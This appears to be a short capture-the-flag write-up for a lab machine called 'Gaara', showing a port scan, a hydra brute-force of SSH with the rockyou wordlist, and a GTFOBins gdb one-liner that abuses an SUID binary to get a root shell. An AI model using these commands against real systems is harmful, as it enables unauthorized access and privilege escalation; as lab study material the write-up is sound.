Gaara¶
192.168.1.146
Port Scan¶
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
Nothing too interesting with the webserver, so I opted to brute-force ssh.
hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.1.146 ssh
Found an interesting base64 encoded clue
decoded:
The clue points to this file, which seems to contain some encrypted data:
I couldn't figure out what cipher (if any) this is encrypted with. I also wasn't understanding the clues, but they appear to be based on a show Naruto.
Linpeas finds an SUID
GTFOBins makes this easy
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
root flag